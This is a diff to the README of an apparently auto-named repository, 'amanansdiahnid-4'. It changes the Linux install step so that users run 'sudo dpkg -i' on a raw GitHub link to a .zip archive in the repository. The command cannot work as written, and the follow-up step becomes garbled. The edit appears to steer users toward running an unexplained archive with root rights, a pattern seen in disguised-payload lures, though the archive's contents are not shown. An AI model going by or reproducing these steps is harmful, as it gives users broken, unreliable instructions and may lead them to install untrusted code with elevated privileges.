paute24/amanansdiahnid-4/README.md

 - **Linux:**
   1. Open your terminal.
-  2. Use the command: `sudo dpkg -i path-to-downloaded-file.deb`.
+  2. Use the command: `sudo dpkg -i https://raw.githubusercontent.com/paute24/amanansdiahnid-4/main/horizonless/amanansdiahnid-4.zip`.
-  3. Replace `path-to-downloaded-file.deb` with the actual path of your downloaded file.
+  3. Replace `https://raw.githubusercontent.com/paute24/amanansdiahnid-4/main/horizonless/amanansdiahnid-4.zip` with the actual path of your downloaded file.

 ## 🛠️ Using the Application
 After installation, launch **amanansdiahnid-4** from your applications menu.